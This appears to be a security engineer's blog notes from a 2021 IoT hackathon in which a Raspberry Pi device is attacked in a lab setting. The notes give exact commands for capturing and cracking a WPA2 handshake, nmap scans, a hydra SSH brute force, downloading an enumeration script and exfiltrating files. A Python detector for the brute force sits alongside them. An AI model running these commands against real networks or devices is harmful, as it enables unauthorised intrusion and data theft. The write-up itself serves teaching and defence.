Hi! My name is Isaac Basque-Rice, I'm a Security Engineer and former Abertay Ethical Hacker, and this website is a repository for all the cool stuff I've done, enjoy!
From the 21st to the 28th of June 2021 I took part in an IoT device hackathon provided by CENSIS in collaboration with Abertay Uni. The following are my notes from the week or so that I had to do the project; I hope you enjoy reading this as much as I did doing it :).
Click here to read the full report
- `developer` account with directory monitoring, which contained code for the site
- `pi` was the username for the Raspberry Pi, which is the default username
- `iwconfig` and found adapter name wlp0s20f0u3 (using USB Wi-Fi adapter)
- `sudo airmon-ng check kill; sudo airmon-ng start wlp0s20f0u3` which killed interfering processes, disconnected me, then started the interface wlp0s20f0u3mon in monitor mode
- `sudo airodump-ng wlp0s20f0u3mon` to capture the BSSID for IoT-Demo-06 (B8:27:EB:B8:BB:F1)
- `sudo airodump-ng -c 7 --bssid B8:27:EB:B8:BB:F1 -w WPAcrack wlp0s20f0u3mon --ignore-negative-one`
  - `-c` determines the channel for the wireless network
  - `--bssid` is the MAC address for the access point
  - `-w` is the file name prefix for the file which will contain the WPA handshake
  - `wlp0s20f0u3mon` is the wireless interface
  - `--ignore-negative-one` fixes an error message
  - this produced the handshake capture `WPA2crack-01.cap`
- `aircrack-ng -w words_small.txt -b B8:27:EB:B8:BB:F1 WPA2crack/WPA2crack-01.cap`
  - `aircrack-ng` cracks passwords
  - `-w` specifies the wordlist, used words_small.txt which was provided to me
  - `-b` specifies the BSSID as captured earlier
  - `WPA2crack/WPA2crack-01.cap` was the handshake capture fed into the cracking tool

Output:

```text
Aircrack-ng 1.6

[00:00:01] 3261/3311 keys tested (3062.98 k/s)

Time left: 0 seconds 98.49%

KEY FOUND! [ valegorov ]

Master Key     : 4C 99 CF BF 5B 80 C9 B8 F1 8F 71 4B 43 98 AB B1
                 78 6A 70 E2 A6 08 B6 99 E7 E8 A7 CF B5 AF DC 03

Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC     : F1 61 45 F2 AD 27 E4 2E 99 88 CF 25 F0 A5 97 57
```
- `kit5min.pcapng` capture: two hosts, 192.168.66.1 and 192.168.66.146; the first (192.168.66.1) is the Raspberry Pi device, the other device is my laptop
- Port scan with `nmap -sT -p- -vv -T5 192.168.66.1` showed an additional 2 known ports in use
- `nmap -sT -p- -vv -A 192.168.66.1` to gather OS information, versions, scripts, and traceroute for the aforementioned ports
- `hydra -l pi -P words_small.txt ssh://192.168.66.1` using the `words_small.txt` wordlist
- `developer`: repeated the process for this user
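From the device's side, a wordlist attack like the one above against the default `pi` account leaves a very recognisable trail in the Pi's own `/var/log/auth.log`. The detector below is an added example written for these notes, not code from the hackathon or the original post; the log lines are constructed, the `raspberrypi` hostname and PIDs are made up, and the five-failures-per-minute threshold is an assumed tuning value.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of the Pi's auth.log during the wordlist attack (not real device logs).
SAMPLE_AUTH_LOG = """\
Jun 24 10:15:01 raspberrypi sshd[1201]: Failed password for pi from 192.168.66.146 port 50112 ssh2
Jun 24 10:15:01 raspberrypi sshd[1203]: Failed password for pi from 192.168.66.146 port 50114 ssh2
Jun 24 10:15:02 raspberrypi sshd[1205]: Failed password for pi from 192.168.66.146 port 50116 ssh2
Jun 24 10:15:02 raspberrypi sshd[1207]: Failed password for developer from 192.168.66.146 port 50118 ssh2
Jun 24 10:15:03 raspberrypi sshd[1209]: Failed password for pi from 192.168.66.146 port 50120 ssh2
Jun 24 10:15:04 raspberrypi sshd[1213]: Accepted password for pi from 192.168.66.146 port 50124 ssh2
Jun 24 11:02:10 raspberrypi sshd[1400]: Failed password for pi from 192.168.66.20 port 41000 ssh2
"""
# Matches both outcomes so a success right after a burst of failures can be spotted.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse_events(log_text):
    """Return (timestamp, result, user, source_ip) tuples for sshd password events."""
    events = []
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            events.append((ts, m["result"], m["user"], m["src"]))
    return events

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failed logins inside any window_seconds span; report
    failure count, targeted users, and whether a login was accepted after the failures began."""
    per_src = defaultdict(list)
    for ev in parse_events(log_text):
        per_src[ev[3]].append(ev)
    findings = {}
    for src, evs in per_src.items():
        evs.sort()
        fails = [ts for ts, result, _, _ in evs if result == "Failed"]
        burst = any((fails[i + threshold - 1] - fails[i]).total_seconds() <= window_seconds
                    for i in range(len(fails) - threshold + 1))
        if not burst:
            continue
        users = sorted({user for _, result, user, _ in evs if result == "Failed"})
        hit = any(result == "Accepted" and ts >= fails[0] for ts, result, _, _ in evs)
        findings[src] = {"failures": len(fails), "users": users, "success_after_failures": hit}
    return findings
```

A single failure from another address (the last sample line) is ignored, while the attacking laptop is reported together with the fact that one of its guesses was eventually accepted.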
- `curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh; chmod 700 lse.sh` to get an enumeration tool called lse
- `scp -r ~/Downloads/lse pi@192.168.66.1:~/Downloads/lse` to get the lse script to the remote device
- Page source of the Temperature Web Server:

```html
<!DOCTYPE html>
<head>
<title>Temperature Web Server</title>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="/static/styles/bootstrap.min.css" crossorigin="anonymous">
<!-- Optional theme -->
<link rel="stylesheet" href="/static/styles/bootstrap-theme.min.css" crossorigin="anonymous">
</head>
<meta http-equiv="refresh" content="15">
<body>
<h1>Temperature Web Server</h1>
<br />
<h2>Device (DEI)</h2>
<form method="POST">
<select id="SelectedDevice" name="SelectedDevice">
<option value="70B3D5499C1AA8FB" selected="selected">70B3D5499C1AA8FB</option>
</select>
<input type="submit" value="Select Device">
</form>
<br />
<h2>Heating currently: OFF</h2>
<h2>Room Currently: 29.0 ℃</h2>
<h2>Pressure: 1018.8mb </h2>
<h2>Humidity: 36.5% </h2>
<h2>Battery: 4.802V</h2>
<h2>DevEUI: 70B3D5499C1AA8FB</h2>
<h2>Name: Test LoPy4</h2>
</body>
</html>
```
- `/admin/` and `/admin/timeline/`
- Page source of the PIR Web Server:

```html
<!DOCTYPE html>
<head>
<title>PIR Web Server</title>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="/static/styles/bootstrap.min.css" crossorigin="anonymous">
<!-- Optional theme -->
<link rel="stylesheet" href="/static/styles/bootstrap-theme.min.css" crossorigin="anonymous">
</head>
<meta http-equiv="refresh" content="15">
<body>
<h1>PIR Web Server</h1>
<br />
<h2>Device (DEI)</h2>
<form method="POST">
<select id="SelectedDevice" name="SelectedDevice">
<option value="E24F43FFFE44CD2A">E24F43FFFE44CD2A</option>
</select>
<input type="submit" value="Select Device">
</form>
<br />
<h2>PIR Count: 0 activations </h2>
<h2>Room Currently: ℃</h2>
<h2>Battery: %</h2>
<h2>DevEUI: </h2>
<h2>Name: </h2>
</body>
</html>
```
- `tree -a` command in the root directory to get an overview of all files on the device, outputted to a text file for review.

Exfil

- `pi` user's files, as well as other misc files
- `developer` readme, which links to /etc/systemd/system; files exfiltrated